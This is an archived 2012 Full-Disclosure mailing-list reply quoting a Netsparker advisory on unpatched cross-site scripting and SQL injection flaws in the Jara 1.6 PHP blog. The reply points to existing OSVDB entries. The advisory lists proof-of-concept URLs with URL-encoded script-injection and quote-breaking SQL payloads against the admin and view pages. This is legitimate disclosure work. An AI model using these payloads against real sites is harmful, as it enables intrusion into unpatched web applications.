lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20120824051905.GB17896@kludge.henri.nerv.fi>
Date: Fri, 24 Aug 2012 08:19:05 +0300
From: Henri Salo <henri@...v.fi>
To: Netsparker Advisories <advisories@...itunasecurity.com>,
	bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Re: XSS and SQL Injection Vulnerabilities in Jara

On Wed, Aug 22, 2012 at 12:33:37PM +0300, Netsparker Advisories wrote:
> Information
> --------------------
> Name :  XSS and SQL Injection Vulnerabilities in Jara
> Software :  Jara 1.6 and possibly below.
> Vendor Homepage :  http://sourceforge.net/projects/jara/
> Vulnerability Type :  Cross-Site Scripting and SQL Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-009
> 
> Description
> --------------------
> An open source simple blog utilising the features of PHP 5 and MySQL
> 5. Supports multiple writers, categories, managing posts, static
> content pages and post comments as well as providing an intuitive
> administration panel.
> 
> Details
> --------------------
> Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.
> 
> Example PoC urls are as follows :
> 
> SQL Injection Vulnerabilities
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_post.php (POST - id)
> http://example.com/admin/edit_category.php (POST - id)
> 
> XSS Vulnerabilities
> http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
> http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
> http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
> http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
> http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
> http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
> http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
> http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> 
> 
> You can read the full article about Cross-Site Scripting and SQL
> Injection vulnerabilities from here :
> 
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> SQL Injection: http://www.mavitunasecurity.com/sql-injection/
> 
> Solution
> --------------------
> No patch released.
> 
> Advisory Timeline
> --------------------
> 19/11/2011 - Couldn’t found a contact e-mail
> 22/08/2012 - Vulnerability Released
> 
> Credits
> --------------------
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> --------------------
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> --------------------
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, <advisories@...itunasecurity.com>
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Also some of these issues have been listed in OSVDB. You should check vulnerability databases before posting advisories.

http://osvdb.org/show/osvdb/76484
http://osvdb.org/show/osvdb/83346
http://osvdb.org/show/osvdb/83345
http://osvdb.org/show/osvdb/83330

You might want to send a message to the project owner via URL https://sourceforge.net/sendmessage.php?touser=2328649

- Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ